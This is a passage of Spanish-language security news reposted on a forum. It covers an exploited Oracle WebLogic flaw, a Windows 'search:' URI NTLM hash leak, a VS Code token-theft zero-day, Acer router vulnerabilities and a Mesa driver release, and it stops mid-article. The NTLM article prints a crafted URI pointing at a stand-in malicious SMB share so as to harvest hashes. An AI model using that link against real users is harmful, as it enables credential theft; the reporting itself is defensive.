La Agencia de Ciberseguridad y Seguridad de Infraestructuras de Estados Unidos (CISA) ha emitido una nueva alerta de seguridad tras incorporar una vulnerabilidad de alta gravedad que afecta a Oracle WebLogic Server a su Catálogo de Vulnerabilidades Explotadas Conocidas (Known Exploited Vulnerabilities Catalog o KEV). La inclusión de esta falla confirma que está siendo utilizada activamente por actores maliciosos en ataques reales, lo que incrementa significativamente el riesgo para organizaciones que aún no han aplicado las actualizaciones de seguridad correspondientes.

La vulnerabilidad, identificada como CVE-2024-21182, posee una puntuación CVSS de 7.5 y permite que atacantes remotos no autenticados comprometan servidores vulnerables a través de protocolos de comunicación específicos utilizados por Oracle WebLogic. Aunque Oracle publicó los parches de seguridad en julio de 2024, la reciente confirmación de explotación activa por parte de CISA demuestra que numerosos sistemas continúan expuestos.

La advertencia refuerza una tendencia que los expertos en ciberseguridad vienen observando desde hace años: Oracle WebLogic sigue siendo uno de los objetivos favoritos de los ciberdelincuentes debido a su amplia adopción en entornos empresariales y gubernamentales.

¿Qué es CVE-2024-21182 y por qué representa una amenaza importante?

La vulnerabilidad CVE-2024-21182 afecta a Oracle WebLogic Server, una de las plataformas de aplicaciones empresariales más utilizadas para desplegar servicios críticos en organizaciones de todo el mundo.

Según la información publicada por CISA, la falla puede ser explotada por un atacante remoto sin necesidad de autenticación previa siempre que tenga acceso a la red y pueda comunicarse con el servidor mediante los protocolos T3 o IIOP.

El problema permite comprometer la integridad y confidencialidad del sistema afectado, pudiendo derivar en:

• Acceso no autorizado a información sensible.
• Exposición de datos críticos de negocio.
• Manipulación de aplicaciones empresariales.
• Compromiso completo del servidor.
• Movimiento lateral dentro de la infraestructura corporativa.
• Escalada de privilegios en entornos conectados.

CISA advirtió que un ataque exitoso puede otorgar acceso total a todos los datos accesibles por Oracle WebLogic Server, una situación especialmente preocupante para organizaciones que gestionan información financiera, sanitaria, gubernamental o estratégica.

¿Cómo están explotando los atacantes esta vulnerabilidad?

Por el momento, las autoridades no han revelado detalles técnicos específicos sobre las campañas de explotación observadas en la naturaleza.

Tampoco se han publicado indicadores de compromiso ni herramientas utilizadas por los atacantes para explotar CVE-2024-21182.

Sin embargo, la inclusión de la vulnerabilidad en el catálogo KEV implica que existen evidencias verificadas de explotación activa, lo que significa que actores maliciosos ya están aprovechando el fallo para comprometer sistemas vulnerables.

La ausencia de información pública sobre la cadena de explotación suele responder a razones defensivas, ya que divulgar detalles técnicos completos podría facilitar ataques adicionales contra organizaciones que aún no han aplicado los parches correspondientes.

Oracle WebLogic: un objetivo recurrente para ciberdelincuentes

La explotación de vulnerabilidades en Oracle WebLogic no es un fenómeno nuevo.

Durante los últimos años, múltiples grupos de amenazas, operadores de ransomware y botnets han utilizado vulnerabilidades presentes en esta plataforma para obtener acceso inicial a redes corporativas.

Los investigadores de seguridad han documentado repetidamente campañas que aprovechan fallos de WebLogic para:

Desplegar ransomware

Los servidores comprometidos pueden utilizarse como punto de entrada para cifrar sistemas corporativos y exigir pagos millonarios a las víctimas.

Minería ilegal de criptomonedas

Los atacantes suelen instalar software de cryptojacking para utilizar los recursos de procesamiento del servidor comprometido.

Reclutamiento para botnets

Los sistemas vulnerables pueden convertirse en nodos de redes maliciosas utilizadas para ataques DDoS, distribución de malware o campañas de spam.

Robo de información corporativa

Los atacantes pueden acceder a bases de datos, credenciales, documentos internos y otra información confidencial.

Debido a estas capacidades, WebLogic continúa siendo uno de los servicios empresariales más vigilados por grupos de ciberdelincuencia avanzada.

La rápida explotación de nuevas vulnerabilidades preocupa a los expertos

La advertencia de CISA se produce pocos meses después de que investigadores de seguridad observaran intentos de explotación automatizada contra otra vulnerabilidad crítica de Oracle WebLogic.

A principios de marzo de 2026, expertos de CloudSEK informaron sobre actividades maliciosas dirigidas a CVE-2026-21962, una vulnerabilidad con puntuación CVSS máxima de 10.0.

Según los investigadores, los intentos de explotación comenzaron poco tiempo después de que se hiciera público un código de prueba de concepto (PoC), demostrando la rapidez con la que los actores maliciosos integran nuevas vulnerabilidades en sus arsenales de ataque.

Este comportamiento confirma una realidad cada vez más frecuente en el panorama de amenazas actual: el tiempo disponible para aplicar parches se reduce drásticamente una vez que una vulnerabilidad se hace pública.

Impacto potencial para organizaciones y organismos gubernamentales

La explotación de CVE-2024-21182 podría tener consecuencias significativas para organizaciones que dependen de Oracle WebLogic para ejecutar aplicaciones críticas.

Entre los posibles escenarios de riesgo se encuentran:

Interrupción de operaciones

Los atacantes podrían afectar servicios empresariales esenciales y provocar tiempos de inactividad prolongados.

Filtración de datos sensibles

La información almacenada o procesada por aplicaciones WebLogic podría quedar expuesta.

Compromiso de infraestructuras críticas

Entidades gubernamentales y organizaciones estratégicas podrían sufrir accesos no autorizados a sistemas clave.

Propagación de ataques

Una vez comprometido un servidor, los atacantes pueden utilizarlo para expandirse a otros sistemas de la red.

En sectores altamente regulados, este tipo de incidentes también puede derivar en sanciones legales, incumplimientos normativos y daños reputacionales considerables.

CISA establece una fecha límite para aplicar los parches

Como parte de la Directiva Operacional Vinculante (BOD 22-01), CISA ha ordenado a las agencias pertenecientes al Poder Ejecutivo Civil Federal de Estados Unidos (FCEB) aplicar las actualizaciones necesarias antes del 4 de junio de 2026.

El objetivo es reducir la superficie de exposición frente a ataques activos que ya están aprovechando esta vulnerabilidad.

Aunque la directiva se aplica específicamente a organismos federales estadounidenses, los expertos recomiendan que todas las organizaciones que utilicen Oracle WebLogic adopten medidas similares de manera inmediata.

Recomendaciones de seguridad para administradores

Las organizaciones que ejecutan Oracle WebLogic Server deberían implementar las siguientes acciones prioritarias:

• Verificar inmediatamente la versión instalada del servidor.
• Aplicar los parches de seguridad publicados por Oracle en julio de 2024.
• Revisar registros de actividad en busca de accesos sospechosos.
• Monitorizar conexiones a través de protocolos T3 e IIOP.
• Implementar segmentación de red para limitar movimientos laterales.
• Aplicar controles de acceso estrictos sobre servidores críticos.
• Utilizar soluciones EDR y monitoreo continuo para detectar comportamientos anómalos.

Además, se recomienda realizar evaluaciones de vulnerabilidades periódicas para identificar sistemas expuestos antes de que puedan ser comprometidos.

La explotación activa convierte a CVE-2024-21182 en una prioridad crítica

La incorporación de CVE-2024-21182 al Catálogo de Vulnerabilidades Explotadas Conocidas de CISA es una señal clara de que la amenaza es real y está afectando activamente a organizaciones en entornos productivos.

Aunque el fallo fue corregido hace casi dos años, la persistencia de sistemas sin actualizar continúa ofreciendo oportunidades valiosas para ciberdelincuentes que buscan acceso inicial a infraestructuras corporativas.

Ante este escenario, la aplicación inmediata de los parches de Oracle, junto con una estrategia sólida de gestión de vulnerabilidades, resulta esencial para reducir el riesgo de compromiso y proteger activos críticos frente a ataques cada vez más sofisticados.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Investigadores en ciberseguridad han revelado una nueva vulnerabilidad sin parchear en Windows que podría ser utilizada por ciberdelincuentes para obtener hashes NTLMv2 de usuarios legítimos, abriendo la puerta a ataques de retransmisión, movimientos laterales y posibles compromisos de red.

El hallazgo, divulgado por los expertos de Huntress, afecta al manejador de URI "search:" de Windows y comparte importantes similitudes con una vulnerabilidad corregida recientemente por Microsoft, identificada como CVE-2026-33829. Aunque el fabricante fue informado de manera responsable sobre el problema, la compañía decidió no emitir una actualización de seguridad debido a que considera que el fallo no alcanza el umbral requerido para una corrección prioritaria.

La revelación ha generado preocupación entre profesionales de seguridad y administradores de sistemas, ya que el fallo puede ser explotado mediante técnicas relativamente sencillas para provocar que un sistema Windows revele credenciales de autenticación NTLMv2 a servidores controlados por atacantes.

¿Qué es NTLMv2 y por qué sigue siendo un objetivo atractivo?

NTLM (New Technology LAN Manager) es un protocolo de autenticación desarrollado por Microsoft que continúa presente en numerosos entornos empresariales, especialmente en infraestructuras heredadas y redes híbridas.

Aunque tecnologías más modernas como Kerberos han reemplazado gran parte de su funcionalidad, NTLM sigue siendo ampliamente utilizado para la autenticación de usuarios, el acceso a recursos compartidos y determinados servicios internos de Windows.

Cuando un sistema intenta autenticarse utilizando NTLMv2, genera un hash criptográfico que, si bien no contiene directamente la contraseña del usuario, puede ser aprovechado por atacantes para realizar diferentes tipos de ataques.

Entre ellos destacan:

• Ataques de retransmisión NTLM.
• Movimiento lateral dentro de la red.
• Acceso no autorizado a recursos corporativos.
• Escalada de privilegios.
• Reconocimiento avanzado de infraestructura.

Por este motivo, cualquier vulnerabilidad capaz de exponer hashes NTLMv2 representa una amenaza significativa para la seguridad empresarial.

Cómo funciona la nueva vulnerabilidad descubierta por Huntress

Según explicó Andrew Schwartz, investigador de Huntress, el problema reside en el manejador URI "search:" integrado en Windows.

La vulnerabilidad permite que un atacante cree enlaces especialmente manipulados capaces de inducir al sistema operativo a conectarse automáticamente a un recurso SMB remoto controlado por el atacante.

El comando utilizado para explotar esta debilidad tiene la siguiente estructura:

search=test&crumb=location:\servidor_malicioso\share

Cuando la víctima interactúa con el enlace, Windows intenta acceder a la ubicación especificada utilizando una ruta UNC (Universal Naming Convention).

Durante este proceso, el sistema inicia automáticamente un procedimiento de autenticación NTLM para intentar conectarse al recurso remoto.

Como consecuencia, el hash Net-NTLMv2 del usuario es enviado al servidor controlado por el atacante, quien puede capturarlo para posteriores acciones maliciosas.

Similitudes con CVE-2026-33829

Los investigadores señalaron que este nuevo problema comparte numerosas características con la vulnerabilidad CVE-2026-33829, corregida por Microsoft en abril de 2026.

Aquella vulnerabilidad afectaba al manejador URI utilizado por la Herramienta de Recorte de Windows (Snipping Tool), específicamente a través del parámetro "filePath".

El fallo permitía que la aplicación accediera a rutas UNC arbitrarias sin realizar una validación adecuada, provocando exactamente el mismo resultado: la filtración de hashes Net-NTLMv2 mediante conexiones SMB controladas por atacantes.

En ambos casos se observan características prácticamente idénticas:

• Exposición de hashes NTLMv2.
• Requerimiento de interacción del usuario.
• Uso de rutas UNC remotas.
• Posibilidad de ataques de retransmisión.
• Clasificación de gravedad moderada.

Sin embargo, mientras Microsoft corrigió CVE-2026-33829, decidió no actuar sobre esta nueva variante.

Un problema que recuerda a vulnerabilidades anteriores

Aunque la vulnerabilidad ha ganado notoriedad recientemente, el uso del parámetro "crumb" para provocar fugas de credenciales no es completamente nuevo.

Los investigadores recordaron que una técnica similar ya había sido documentada anteriormente en la vulnerabilidad CVE-2023-35636, analizada por expertos de seguridad en 2024.

Esto demuestra que los manejadores URI continúan representando una superficie de ataque relevante dentro del ecosistema Windows, especialmente cuando interactúan con protocolos heredados como SMB y NTLM.

La persistencia de este tipo de escenarios evidencia las dificultades que enfrentan los fabricantes para eliminar por completo riesgos asociados a componentes históricos que aún forman parte de millones de sistemas empresariales.

Riesgos para organizaciones y entornos corporativos

La filtración de hashes NTLMv2 puede parecer un problema menor a primera vista, pero en realidad puede tener consecuencias significativas para la seguridad de una organización.

Una vez capturado el hash, un atacante puede utilizar herramientas especializadas para ejecutar ataques de retransmisión NTLM contra otros sistemas dentro de la red.

En entornos mal segmentados, esto puede facilitar:

Acceso a recursos internos

Los atacantes pueden autenticarse frente a servicios que acepten conexiones NTLM.

Movimiento lateral

La obtención de credenciales válidas facilita el desplazamiento entre diferentes sistemas de la infraestructura.

Escalada de privilegios

En determinadas circunstancias, los atacantes podrían aprovechar configuraciones inseguras para obtener permisos elevados.

Compromiso de servicios críticos

Controladores de dominio, servidores de archivos y aplicaciones empresariales podrían convertirse en objetivos posteriores.

Por esta razón, incluso vulnerabilidades clasificadas como moderadas pueden representar un riesgo considerable cuando son utilizadas como parte de cadenas de ataque más complejas.

Microsoft rechaza emitir un parche

Tras recibir la divulgación responsable el 15 de abril de 2026, Microsoft analizó el problema y decidió no desarrollar una corrección.

Según la respuesta proporcionada a los investigadores, la compañía indicó que únicamente los casos catalogados como de gravedad Importante o Crítica cumplen actualmente los criterios necesarios para recibir mantenimiento de seguridad dentro de su programa de respuesta.

Esta decisión ha generado debate entre profesionales del sector, quienes consideran que las fugas de hashes NTLM continúan siendo una amenaza relevante en redes empresariales modernas.

Medidas de mitigación recomendadas

Ante la ausencia de una solución oficial, los especialistas recomiendan adoptar varias medidas defensivas para reducir significativamente la superficie de ataque.

Bloquear SMB saliente

Las organizaciones deberían restringir el tráfico SMB saliente a través de los puertos TCP 445 y TCP 139 en aquellos equipos que no requieran este tipo de conexiones.

Habilitar la firma SMB

La firma SMB dificulta considerablemente los ataques de retransmisión al garantizar la integridad de las comunicaciones.

Desactivar NTLM cuando sea posible

Microsoft lleva años recomendando la transición hacia mecanismos de autenticación más seguros como Kerberos.

Implementar segmentación de red

Una adecuada segmentación limita el impacto potencial de cualquier credencial comprometida.

Capacitar a los usuarios

La mayoría de los escenarios de explotación requieren que la víctima interactúe con enlaces maliciosos, por lo que la concienciación sigue siendo una medida fundamental.

Un nuevo recordatorio de los riesgos asociados a NTLM

La nueva vulnerabilidad descubierta en el manejador URI "search:" de Windows pone de manifiesto que NTLM continúa siendo una superficie de ataque relevante dentro de los entornos corporativos modernos.

Aunque Microsoft considera que el problema no justifica una actualización de seguridad, la posibilidad de capturar hashes NTLMv2 y utilizarlos en ataques posteriores representa un riesgo que las organizaciones no deben ignorar.

Mientras no exista una corrección oficial, la implementación de controles defensivos como el bloqueo de SMB saliente, la firma SMB obligatoria y la eliminación progresiva de NTLM seguirá siendo la mejor estrategia para reducir la exposición frente a este tipo de amenazas y fortalecer la seguridad de la infraestructura empresarial.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una nueva vulnerabilidad Zero-Day descubierta en Visual Studio Code (VS Code) ha encendido las alarmas en la comunidad de ciberseguridad tras la publicación de un código de explotación funcional que permite a los atacantes robar tokens de autenticación de GitHub. El fallo, que actualmente no cuenta con un parche oficial ni un identificador CVE asignado, podría facilitar el acceso no autorizado a repositorios privados y otros recursos asociados a las cuentas de las víctimas.

El investigador de seguridad Ammar Askar fue quien dio a conocer públicamente tanto los detalles técnicos de la vulnerabilidad como una prueba de concepto (PoC) capaz de demostrar el impacto real del problema. Según explicó, el fallo afecta a la integración entre GitHub y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, la versión web de Visual Studio Code que permite editar repositorios directamente desde el navegador.

La divulgación pública del exploit ha generado preocupación debido a que los atacantes podrían aprovechar esta vulnerabilidad para obtener acceso a información sensible almacenada en repositorios privados, comprometiendo proyectos de desarrollo, código fuente propietario y datos empresariales críticos.

¿Cómo funciona la vulnerabilidad Zero-Day en VS Code?

El fallo se encuentra relacionado con el sistema de comunicación utilizado por las WebViews de Visual Studio Code. Las WebViews son componentes que permiten ejecutar contenido web dentro del entorno del editor y facilitan la interacción entre extensiones y la interfaz principal de la aplicación.

De acuerdo con la investigación de Askar, un atacante puede abusar del mecanismo de intercambio de mensajes entre la WebView y el editor principal para ejecutar código JavaScript malicioso capaz de simular pulsaciones de teclado y realizar acciones automatizadas sin el consentimiento del usuario.

El escenario de ataque comienza cuando una víctima es engañada para hacer clic en un enlace especialmente diseñado. Una vez abierto el enlace, el código malicioso aprovecha la debilidad presente en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para instalar silenciosamente una extensión maliciosa dentro de la sesión del navegador.

Posteriormente, dicha extensión obtiene acceso al token OAuth utilizado por GitHub para autenticar al usuario y permitir la interacción con los repositorios.

El riesgo real: acceso a todos los repositorios privados

Uno de los aspectos más preocupantes de esta vulnerabilidad es el alcance de los permisos asociados al token OAuth robado.

Según explicó el investigador, GitHub envía un token de autenticación a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para permitir que el usuario interactúe con sus repositorios directamente desde la interfaz web de Visual Studio Code.

Sin embargo, el token no está limitado únicamente al repositorio específico desde el que se inició la sesión.

Esto significa que, una vez comprometido, el atacante puede utilizar dicho token para acceder a todos los repositorios privados a los que tenga permisos la víctima.

Entre las acciones potenciales que podrían realizarse destacan:

• Enumerar repositorios privados.
• Acceder al contenido completo del código fuente.
• Descargar proyectos internos.
• Consultar historiales de cambios.
• Obtener información sobre colaboradores y configuraciones.
• Exfiltrar datos confidenciales almacenados en los repositorios.

Para organizaciones que utilizan GitHub como plataforma principal de desarrollo, este escenario representa un riesgo significativo para la propiedad intelectual y la seguridad corporativa.

Publicación del exploit y divulgación responsable

La vulnerabilidad fue revelada públicamente junto con una prueba de concepto funcional, una decisión que ha generado debate dentro de la comunidad de seguridad informática.

Askar afirmó que notificó a GitHub aproximadamente una hora antes de hacer pública la investigación. Sin embargo, aclaró que su intención era realizar una divulgación completa debido a experiencias negativas previas con el proceso de gestión de vulnerabilidades de Microsoft.

Según el investigador, en ocasiones anteriores reportó vulnerabilidades relacionadas con VS Code que, según sus declaraciones, fueron corregidas sin reconocimiento formal y clasificadas como problemas sin impacto en la seguridad.

Esta situación lo llevó a adoptar una postura de divulgación pública inmediata para futuros hallazgos relacionados con Visual Studio Code.

Crecen las críticas al proceso de respuesta de seguridad de Microsoft

La polémica surge en un contexto donde varios investigadores han expresado públicamente su descontento con el funcionamiento del Microsoft Security Response Center (MSRC), el equipo responsable de gestionar reportes de vulnerabilidades en productos de Microsoft.

Durante los últimos meses, diversos fallos Zero-Day han sido revelados por investigadores independientes sin esperar los ciclos tradicionales de divulgación coordinada.

Uno de los casos más conocidos involucra al investigador anónimo conocido como "Nightmare Eclipse", responsable de revelar múltiples vulnerabilidades que afectaban a diferentes componentes del ecosistema Windows.

Entre los fallos divulgados se encuentran:

• BlueHammer.
• RedSun.
• GreenPlasma.
• MiniPlasma.
• YellowKey.
• UnDefender.

Algunos de estos problemas ya han sido vinculados a ataques reales, aumentando la presión sobre Microsoft para acelerar sus procesos de respuesta y corrección.

Microsoft responde a las críticas

Tras la publicación del nuevo Zero-Day de Visual Studio Code, Microsoft emitió una declaración oficial en la que reafirmó su compromiso con la comunidad de investigación en seguridad.

La compañía destacó que valora el trabajo realizado por los investigadores independientes y aseguró que continúa evaluando de manera rápida los problemas reportados para implementar mitigaciones y protecciones lo antes posible.

Asimismo, Microsoft señaló que, aunque los investigadores pueden decidir cuándo y cómo divulgar sus hallazgos, la empresa mantiene equipos especializados preparados para analizar vulnerabilidades, desarrollar correcciones y ofrecer orientación de seguridad a sus clientes.

La declaración busca reducir la tensión generada por las recientes controversias relacionadas con la divulgación de vulnerabilidades y la gestión de reportes por parte del MSRC.

Cómo protegerse mientras no exista un parche oficial

Dado que actualmente no existe una actualización de seguridad disponible para corregir este fallo, los usuarios de Visual Studio Code y GitHub deben adoptar medidas preventivas para minimizar el riesgo de explotación.

La principal recomendación consiste en eliminar las cookies y los datos locales asociados a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en el navegador.

Para hacerlo, se deben seguir estos pasos:

• Abrir You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en el navegador.
• Hacer clic en el icono de configuración ubicado junto a la barra de direcciones.
• Acceder a la sección "Cookies y datos del sitio".
• Seleccionar "Gestionar los datos del sitio en el dispositivo".
• Eliminar todos los datos almacenados relacionados con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Al realizar este procedimiento, GitHub mostrará una advertencia explícita cuando una extensión intente iniciar sesión utilizando la cuenta del usuario, proporcionando una capa adicional de protección frente a intentos de explotación.

Un nuevo recordatorio sobre los riesgos de las extensiones y aplicaciones web

La aparición de este nuevo Zero-Day en Visual Studio Code demuestra una vez más cómo los mecanismos de integración entre aplicaciones web, navegadores y plataformas de desarrollo pueden convertirse en objetivos atractivos para los ciberdelincuentes.

El robo de tokens OAuth representa una amenaza especialmente peligrosa porque permite a los atacantes actuar en nombre de la víctima sin necesidad de conocer contraseñas o superar sistemas de autenticación multifactor.

Mientras Microsoft y GitHub analizan el problema y desarrollan una solución definitiva, las organizaciones y desarrolladores deben extremar las precauciones al interactuar con enlaces externos y revisar cuidadosamente los permisos otorgados a extensiones y aplicaciones conectadas a sus cuentas de GitHub.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Acer ha confirmado la existencia de dos vulnerabilidades Zero-Day de máxima gravedad que afectan a sus routers mesh Wave 7, una situación que podría exponer a miles de usuarios a ataques remotos capaces de comprometer por completo la seguridad de sus redes domésticas y empresariales.

Los fallos de seguridad, identificados como CVE-2026-49200 y CVE-2026-49201, fueron descubiertos y reportados por el investigador de seguridad Gergo Pap. Según el aviso oficial emitido por Acer, ambas vulnerabilidades afectan a los dispositivos Wave 7 que ejecutan la versión de firmware T7c_GBL_1.01.000055 o anteriores.

La gravedad de estos errores radica en que pueden ser explotados por atacantes remotos sin necesidad de autenticación previa, permitiendo desde el robo de credenciales hasta la implantación de accesos persistentes mediante puertas traseras, comprometiendo la integridad y confidencialidad de las comunicaciones de los usuarios.

CVE-2026-49200: exposición de credenciales en texto plano

La primera vulnerabilidad identificada, catalogada como CVE-2026-49200, corresponde a un problema de control de acceso insuficiente que permite a atacantes no autenticados acceder a información altamente sensible almacenada dentro del router.

De acuerdo con la documentación publicada por Acer, el archivo de registro denominado acer_cgi.log puede ser consultado a través de la interfaz web sin requerir autenticación. El problema es especialmente grave porque dicho archivo contiene credenciales almacenadas en texto claro.

Entre los datos expuestos se encuentran:

• Credenciales de acceso al panel web de administración.
• Datos de autenticación para servicios Telnet.
• Información que podría facilitar movimientos laterales dentro de la red.

La presencia de credenciales sin cifrar en archivos accesibles públicamente representa una vulnerabilidad crítica que podría ser explotada para obtener acceso administrativo completo al dispositivo.

Una vez comprometido el router, un atacante podría modificar configuraciones de red, interceptar tráfico, redirigir conexiones, desplegar malware o utilizar el dispositivo como punto de acceso para comprometer otros equipos conectados.

CVE-2026-49201: clave criptográfica codificada permite instalar puertas traseras

La segunda vulnerabilidad, identificada como CVE-2026-49201, presenta un escenario igualmente preocupante.

Según Acer, el componente upload.cgi, encargado de gestionar las copias de seguridad del dispositivo, contiene una clave criptográfica AES codificada de forma estática dentro del firmware.

Este tipo de práctica es considerada una debilidad de seguridad crítica porque permite que un atacante que conozca dicha clave pueda:

• Descifrar archivos de respaldo del sistema.
• Modificar configuraciones internas del router.
• Alterar parámetros de seguridad.
• Reempaquetar y cifrar nuevamente las copias manipuladas.
• Introducir puertas traseras persistentes difíciles de detectar.

En términos prácticos, un ciberdelincuente podría crear una copia de seguridad modificada que incluya mecanismos de acceso ocultos y posteriormente restaurarla en el dispositivo, obteniendo control permanente incluso después de reinicios o cambios superficiales de configuración.

Los expertos advierten que este tipo de vulnerabilidades suelen ser especialmente peligrosas porque facilitan ataques persistentes y difíciles de erradicar, permitiendo que los atacantes mantengan acceso prolongado a la infraestructura comprometida.

Impacto de las vulnerabilidades en la seguridad de la red

Los routers representan uno de los componentes más importantes dentro de cualquier entorno conectado, ya que actúan como punto central de comunicación entre dispositivos locales e Internet.

Cuando un router resulta comprometido, las consecuencias pueden extenderse a toda la red.

Entre los riesgos asociados a estas vulnerabilidades destacan:

Robo de información sensible

Los atacantes podrían interceptar tráfico de red y recopilar información confidencial, incluyendo credenciales, sesiones activas y datos personales.

Secuestro de tráfico

Un ciberdelincuente podría modificar configuraciones DNS para redirigir a los usuarios hacia sitios web maliciosos diseñados para el robo de credenciales o la distribución de malware.

Persistencia avanzada

La vulnerabilidad relacionada con la clave AES codificada facilita la instalación de mecanismos de acceso persistente que pueden permanecer activos durante largos períodos.

Compromiso de dispositivos conectados

Una vez obtenido el control del router, los atacantes podrían utilizarlo como plataforma para lanzar ataques contra ordenadores, smartphones, dispositivos IoT y otros equipos conectados a la misma red.

Acer prepara actualizaciones de seguridad

Aunque actualmente no existen parches públicos disponibles para corregir estas vulnerabilidades, Acer aseguró que ya está trabajando en soluciones de seguridad.

La compañía indicó que las correcciones serán distribuidas mediante futuras actualizaciones de firmware programadas para finales de junio de 2026.

El fabricante recomendó a todos los usuarios mantenerse atentos a los avisos oficiales y aplicar las actualizaciones tan pronto como estén disponibles para minimizar la superficie de ataque.

Cómo actualizar el firmware del router Acer Wave 7

Una vez que Acer publique las correcciones, los usuarios podrán verificar e instalar las actualizaciones siguiendo estos pasos:

• Conectar un ordenador al router Acer Wave 7 mediante Wi-Fi o cable Ethernet.
• Abrir un navegador web.
• Acceder al panel de administración mediante:
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• Iniciar sesión con una cuenta de administrador.
• Dirigirse al apartado Gestión de Sistemas.
• Seleccionar Actualización de firmware.
• Pulsar en Comprobar actualizaciones.
• Instalar la versión más reciente disponible.

Medidas de mitigación recomendadas

Hasta que los parches oficiales sean liberados, Acer recomienda implementar medidas preventivas para reducir el riesgo de explotación.

Las principales recomendaciones incluyen:

• Desactivar la administración remota del router siempre que sea posible.
• Limitar el acceso remoto exclusivamente a direcciones IP de confianza.
• Cambiar periódicamente las credenciales administrativas.
• Supervisar registros de actividad sospechosa.
• Deshabilitar servicios innecesarios como Telnet si el dispositivo lo permite.
• Mantener segmentados los dispositivos críticos dentro de la red.

Un recordatorio de los riesgos asociados a los dispositivos conectados

La aparición de estas vulnerabilidades en los routers Acer Wave 7 vuelve a poner de manifiesto la importancia de la seguridad en los dispositivos de red. Los routers son objetivos frecuentes de los ciberdelincuentes debido a su posición estratégica dentro de las infraestructuras digitales.

La combinación de credenciales expuestas en texto plano y claves criptográficas codificadas representa una amenaza significativa que podría ser aprovechada para comprometer completamente una red doméstica o empresarial.

Mientras Acer finaliza el desarrollo de los parches correspondientes, los usuarios afectados deben adoptar medidas de mitigación inmediatas y mantenerse atentos a las futuras actualizaciones de firmware que corregirán estos dos peligrosos fallos Zero-Day.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El ecosistema gráfico de Linux continúa evolucionando con el lanzamiento de Mesa 26.0.8, la nueva actualización de mantenimiento de la rama estable 26.0 de una de las colecciones de controladores gráficos de código abierto más importantes del mundo. Aunque esta versión no incorpora nuevas características revolucionarias, sí introduce numerosas correcciones de errores, mejoras de compatibilidad y ajustes destinados a ofrecer una experiencia más estable para usuarios de tarjetas gráficas AMD, Intel, NVIDIA y otros fabricantes compatibles.

La llegada de Mesa 26.0.8 marca además el cierre oficial de una rama que ha desempeñado un papel fundamental en la evolución del rendimiento gráfico bajo Linux durante los últimos meses. Con importantes avances en tecnologías como Vulkan, optimizaciones para GPUs Radeon y mejoras en diversos controladores, la serie 26.0 se despide dejando una base sólida para futuras versiones.

¿Qué es Mesa y por qué es tan importante para Linux?

Mesa es una implementación de código abierto de diversas API gráficas ampliamente utilizadas en sistemas Linux y Unix. Entre ellas destacan OpenGL, Vulkan, OpenCL y otras tecnologías esenciales para la aceleración gráfica moderna.

En términos prácticos, Mesa actúa como una capa fundamental entre el sistema operativo y el hardware gráfico, permitiendo que aplicaciones, videojuegos y herramientas profesionales aprovechen al máximo las capacidades de las tarjetas gráficas.

Actualmente, la mayoría de las distribuciones Linux utilizan Mesa como componente principal para gestionar el procesamiento gráfico en equipos equipados con GPUs de AMD, Intel y NVIDIA, especialmente cuando se emplean controladores de código abierto.

Gracias a su constante desarrollo, Mesa se ha convertido en una pieza clave para el crecimiento del gaming en Linux, la virtualización gráfica, el desarrollo de software y los entornos de trabajo profesionales basados en sistemas abiertos.

Mesa 26.0.8: una actualización centrada en la estabilidad

A diferencia de las versiones mayores que suelen incorporar nuevas funciones y características experimentales, Mesa 26.0.8 se presenta como una actualización enfocada principalmente en la corrección de errores y la mejora de la estabilidad general.

Los desarrolladores del proyecto han indicado que esta versión representa la última actualización planificada para la rama estable 26.0, por lo que su objetivo principal es garantizar una experiencia fiable antes de que los usuarios migren a ramas más recientes.

Este enfoque resulta especialmente importante para entornos de producción, estaciones de trabajo y usuarios que priorizan la estabilidad frente a la incorporación inmediata de nuevas funcionalidades.

Correcciones para Forza Horizon 6 en GPUs AMD

Uno de los cambios más destacados de Mesa 26.0.8 afecta directamente al controlador RADV, la implementación Vulkan de código abierto para tarjetas gráficas AMD Radeon.

Los desarrolladores han solucionado diversos problemas detectados al ejecutar Forza Horizon 6, uno de los videojuegos más exigentes en términos de procesamiento gráfico.

Este tipo de correcciones son especialmente relevantes para la comunidad gaming de Linux, que ha experimentado un crecimiento notable gracias a tecnologías como Proton, Steam Play y Vulkan.

La optimización del controlador RADV permite mejorar la compatibilidad y reducir posibles errores que podían afectar la experiencia de juego en determinadas configuraciones de hardware AMD.

Mejoras para Intel y Dragon's Dogma 2

Los usuarios de hardware Intel también reciben novedades importantes con esta actualización.

Mesa 26.0.8 incorpora ajustes específicos en el controlador Vulkan ANV, diseñado para GPUs Intel, con el objetivo de mejorar la compatibilidad con Dragon's Dogma 2.

Este popular título ha presentado diversos desafíos técnicos desde su lanzamiento, especialmente en configuraciones Linux donde los controladores gráficos juegan un papel fundamental para garantizar un funcionamiento estable.

Las nuevas correcciones buscan ofrecer una experiencia más consistente y reducir problemas relacionados con el renderizado y la ejecución del juego.

Avances para NVIDIA gracias al controlador NVK

Otro componente que continúa evolucionando es NVK, el controlador Vulkan de código abierto para tarjetas gráficas NVIDIA.

Aunque NVIDIA sigue ofreciendo sus propios controladores propietarios, el desarrollo de NVK representa un avance significativo para quienes prefieren soluciones completamente abiertas dentro del ecosistema Linux.

Mesa 26.0.8 incorpora varias correcciones dirigidas a este controlador, contribuyendo a mejorar la estabilidad y compatibilidad con aplicaciones gráficas modernas.

La evolución constante de NVK demuestra el compromiso de la comunidad de desarrollo con la creación de alternativas abiertas capaces de competir con soluciones propietarias.

Compatibilidad mejorada con LLVM 23

Uno de los aspectos más importantes para administradores de sistemas y desarrolladores es la compatibilidad con nuevas herramientas de compilación.

